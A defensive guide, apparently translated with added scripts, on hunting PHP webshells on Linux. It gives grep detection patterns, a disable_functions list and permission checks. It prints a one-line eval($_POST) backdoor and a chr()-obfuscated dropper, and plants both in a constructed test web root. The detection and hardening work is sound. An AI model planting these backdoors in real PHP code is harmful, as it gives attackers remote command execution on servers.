Finding webshells on Linux

First, get to know the "pony" (小马, a one-line PHP backdoor). A full-blown trojan is easy to spot, so an attacker who wants to keep a foothold will usually plant a pony inside an otherwise normal PHP file:

    <?php eval($_POST[a]); ?>   // the password is a

and then connect to it with China Chopper (中国菜刀). A hidden pony is often written out by obfuscated code such as

    fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112), "w"), chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40)....

The full decoding is omitted here. The numbers inside chr() are ASCII codes (American Standard Code for Information Interchange), so any ASCII table resolves them: 46 is ".", 47 is "/", 32 is a space, and in PHP you can simply run echo chr(46); to see each one. The visible prefix above decodes to the file name ./a.php and the beginning of the payload, <?php eval(.

On Windows there are plenty of log-analysis and webshell-killing tools (I rarely use Windows, so it is not used as the example here). How do we find webshells on Linux?

1. Search the web root for the usual suspicious functions and strings and write the hits to a log file. The pattern in the original contained two misspelled names, gunerpress and base64_decoolcode, which are corrected here to gzuncompress and base64_decode; the garbled superglobal alternative is rewritten as \(\$_POST\[:

    find /www/ -name "*.php" | xargs egrep 'assert|phpspy|c99sh|milw0rm|eval|\(gzuncompress|\(base64_decode|spider_bc|shell_exec|passthru|\(\$_POST\[|eval\(str_rot13' > /opt/www.log &

Review the log by hand, and put the command in a cron job so it runs regularly. Note that plain xargs breaks on file names containing spaces; use find ... -print0 | xargs -0 or find ... -exec egrep ... {} + on such trees.

2. If you only care about ponies, grep for eval on the request superglobals (PHP superglobal names are case-sensitive, so the pattern must say $_POST, not $_post as the original did):

    grep -r --include=*.php '[^a-z]eval($_POST' . > post.txt
    grep -r --include=*.php '[^a-z]eval($_REQUEST' . > REQUEST.txt

Finding the shell is only half the job: analyze the web server logs to trace the intrusion source, that is, how and when the file was uploaded. Prevention: disable dangerous PHP functions, and tidy up file permissions so that the web server account has no more rights than it needs.
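The hunt described above, as an added example that is not code from the original post: it builds a small constructed web root (one clean file, one one-liner pony appended to a normal file, and a dropper that writes ./a.php through chr() chains), runs the find/grep search with a tightened pattern that also catches chr() chains and the other request superglobals, and decodes every chr() chain found in a hit. All file names and contents are made up for the demonstration; the dropper's chain is completed here to a full one-liner, unlike the truncated chain quoted in the post.

```shell
#!/bin/sh
# Added example, not code from the original post. Builds a constructed web root,
# hunts it with the find/grep approach described in the post (pattern tightened
# and extended to catch chr() chains), and decodes the chr() chains in a hit.
# All paths and file contents below are made up for the demonstration.

# Decode a chain such as chr(46).chr(47).chr(97) into the text it builds.
decode_chr() {
    printf '%s' "$1" | grep -o 'chr *( *[0-9][0-9]* *)' | tr -cd '0-9\n' |
        awk '{ printf "%c", $1 + 0 }'   # awk %c turns an ASCII code into its character
}

# Print every chr() chain found in a file, one decoded chain per line.
decode_chr_chains_in() {
    grep -o 'chr *([0-9 ]*)\( *\. *chr *([0-9 ]*)\)*' "$1" | while read -r chain; do
        decode_chr "$chain"
        printf '\n'
    done
}

# List PHP files under a web root that match the suspicious patterns (sorted).
# gzuncompress and base64_decode replace the misspelled names in the original
# pattern; the superglobal and chr() alternatives are added in this example.
hunt_webshells() {
    find "$1" -name '*.php' -exec grep -lE \
        'assert *\(|phpspy|c99sh|milw0rm|eval *\(|gzuncompress *\(|base64_decode *\(|spider_bc|shell_exec|passthru|\$_(POST|GET|REQUEST|COOKIE) *\[|str_rot13|chr *\( *[0-9]+ *\) *\.' \
        {} + | sort
}

# Constructed web root: one clean file, one pony hidden in a normal file, and
# one dropper that writes ./a.php through chr() chains.
make_sample_webroot() {
    root=$(mktemp -d)
    mkdir -p "$root/app" "$root/uploads"
    cat > "$root/app/index.php" <<'EOF'
<?php
echo "Hello, world";
EOF
    cat > "$root/app/config.php" <<'EOF'
<?php
$db_host = "localhost";
eval($_POST[a]);   // the pony appended to an otherwise normal file
EOF
    cat > "$root/uploads/logo.php" <<'EOF'
<?php
fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112), "w"),
      chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59));
EOF
    printf '%s\n' "$root"
}

main() {
    root=$(make_sample_webroot)
    echo "Suspicious PHP files under $root:"
    hunt_webshells "$root"
    echo "Decoded chr() chains in uploads/logo.php:"
    decode_chr_chains_in "$root/uploads/logo.php"
    rm -rf "$root"
}

main
```

Run it with sh; the clean index.php is not reported, both ponies are, and the two chains in the dropper decode to ./a.php and <?php eval($_POST[a]);. Against a real tree, call hunt_webshells with the web root instead of the constructed one and expect false positives from legitimate uses of base64_decode or passthru, which is why the post insists on manual review of the log.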
In php.ini:

    disable_functions = exec,scandir,shell_exec,phpinfo,eval,passthru,system,chroot,chgrp,chown,proc_open,proc_get_status,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popen,passthru,stream_socket_server,fsockopen

The original list had symlink garbled as s2ymlink, popen and passthru run together as popepassthru, and fsocket where the real function name is fsockopen. Two caveats: eval is a language construct rather than a function, so listing it in disable_functions has no effect and ponies built on it still have to be hunted with the grep above; and entries such as scandir or readlink can break legitimate applications, so test the list against your own code before rolling it out.

From the shell detector project on GitHub you only need two files: shelldetect.php and shelldetect.db. The default account is admin with password protect; change it before putting the script on a server. If you have any good suggestions, thank you for sharing them.

PS: reverse shell
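Two checks for the prevention advice above, as an added example that is not code from the original post: the first parses a php.ini and reports which of the recommended functions are still enabled (eval is deliberately left out of the reference list because disable_functions cannot block it), the second lists everything under a web root that group or others can write to, which is where a dropper would land. The php.ini fragment and the web root are constructed inline for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the original post: two hardening checks for the
# prevention advice above. The php.ini fragment and web root are constructed here.

# Functions the post recommends disabling. eval is deliberately absent: it is a
# language construct, not a function, so disable_functions cannot block it.
DANGEROUS_FUNCTIONS='exec scandir shell_exec phpinfo passthru system chroot chgrp chown
proc_open proc_get_status ini_alter ini_restore dl openlog syslog readlink symlink popen
stream_socket_server fsockopen'

# Print, one per line, the dangerous functions a php.ini does not disable.
missing_disabled_functions() {
    # the last active disable_functions line wins; strip the key, spaces and quotes
    disabled=$(grep -E '^[[:space:]]*disable_functions[[:space:]]*=' "$1" | tail -n 1 |
        sed -e 's/^[^=]*=//' -e 's/[[:space:]"]//g')
    for fn in $DANGEROUS_FUNCTIONS; do
        case ",$disabled," in
            *",$fn,"*) ;;                 # already disabled
            *) printf '%s\n' "$fn" ;;
        esac
    done
}

# Print files and directories under a web root that group or others can write to.
# Code should be owned by a deploy user and read-only for the web server account;
# only upload and cache directories should show up here.
writable_by_group_or_others() {
    find "$1" \( -perm -020 -o -perm -002 \) -print | sort
}

# Constructed php.ini that disables only part of the list.
make_sample_ini() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
[PHP]
;disable_functions = exec,system
disable_functions = "exec, shell_exec, system, passthru, phpinfo, proc_open"
EOF
    printf '%s\n' "$f"
}

# Constructed web root with a locked-down app directory and a loose uploads dir.
make_sample_webroot() {
    root=$(mktemp -d)
    mkdir -p "$root/app" "$root/uploads"
    printf '<?php echo "hi";\n' > "$root/app/index.php"
    chmod 755 "$root" "$root/app"
    chmod 644 "$root/app/index.php"
    chmod 777 "$root/uploads"
    printf '%s\n' "$root"
}

main() {
    ini=$(make_sample_ini)
    echo "Not disabled in $ini:"
    missing_disabled_functions "$ini"
    root=$(make_sample_webroot)
    echo "Writable by group/others under $root:"
    writable_by_group_or_others "$root"
    rm -rf "$ini" "$root"
}

main
```

On a real host, point missing_disabled_functions at the php.ini that php --ini reports as loaded (php-fpm and CLI often use different files) and writable_by_group_or_others at the document root; anything reported outside the directories the application genuinely writes to should be tightened.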